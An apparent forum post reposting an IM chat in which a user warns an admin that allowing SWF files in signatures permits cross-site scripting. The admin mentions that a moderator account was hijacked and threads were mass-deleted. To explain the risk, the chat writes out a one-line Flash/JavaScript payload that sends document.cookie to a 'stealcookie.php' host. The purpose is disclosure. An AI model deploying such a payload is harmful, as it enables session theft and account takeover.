[color=#a82f2f]Revengist:[/color] Hi. Are you there?
[color=#16569e]kirupacom <AUTO-REPLY> : [/color][font=tahoma]Hey Revengist,
I’ll brb in a short bit :D[/font]
[color=#a82f2f]Revengist:[/color] Important!
[color=#a82f2f]Revengist:[/color] When you get back please notify me - there something very vulnerable in your site
[color=#a82f2f]Revengist:[/color] Ill BRB
[color=#16569e]kirupacom:[/color] [font=tahoma]hey[/font]
[color=#16569e]kirupacom:[/color] [font=tahoma]what’s up?[/font]
[color=#a82f2f]Revengist:[/color] Heya sir
[color=#a82f2f]Revengist:[/color] Caught me right before I was about to get a drink
[color=#a82f2f]Revengist:[/color] There’s something very important that you have to fix
[color=#16569e]kirupacom:[/color] [font=tahoma]I’m good at doing that![/font]
[color=#a82f2f]Revengist:[/color] I just signed up at your site yesterday
[color=#a82f2f]Revengist:[/color] and I was suprised that you had html code- but it seems you removed that
[color=#16569e]kirupacom:[/color] [font=tahoma]gfxwhore? :)[/font]
[color=#a82f2f]Revengist:[/color] Yes
[color=#a82f2f]Revengist:[/color] But
[color=#a82f2f]Revengist:[/color] You still allow SWFS
[color=#a82f2f]Revengist:[/color] Flash is a dangeR!
[color=#a82f2f]Revengist:[/color] Don’t you know about XSS?
[color=#a82f2f]Revengist:[/color] OK - let me explain it then
[color=#a82f2f]Revengist:[/color] Basically you have your cookies stored in your browser
[color=#a82f2f]Revengist:[/color] and anyone could make a flash applet that does
[color=#a82f2f]Revengist:[/color] getURL(‘javascript: location.href=“script.com/stealcookie.php?cookie=” + document.cookie’);
[color=#a82f2f]Revengist:[/color] then they can use your cookie
[color=#a82f2f]Revengist:[/color] to login and do stuff- it’s very bd
[color=#a82f2f]Revengist:[/color] remove SWF immediately
[color=#16569e]kirupacom:[/color] [font=tahoma]ah - that would explain how someone gained access to a mod’s account yesterday ;)[/font]
[color=#a82f2f]Revengist:[/color] yeh they could do anything man
[color=#a82f2f]Revengist:[/color] you gotta remove it
[color=#a82f2f]Revengist:[/color] never let anyone put swf or html code on your site
[color=#16569e]kirupacom:[/color] [font=tahoma]they linked to pimpsofpain.com as a javascript redirect to, but that’s ok, deleting over 15k threads is what bugs most of the mods more[/font]
[color=#a82f2f]Revengist:[/color] hum i told the owner of pop dub about it the exploit on aim
[color=#a82f2f]Revengist:[/color] but i dont think he would do something like that
[color=#a82f2f]Revengist:[/color] i’m going to get a glass of water and ill brb
[color=#a82f2f]Revengist:[/color] i gotta try to hook up my other com
[color=#16569e]kirupacom:[/color] [font=tahoma]cya!
[/font]
[font=Tahoma]So that’s why most forums don’t allow SWF in sigs. Should I go ahead and disable SWFs?[/font]
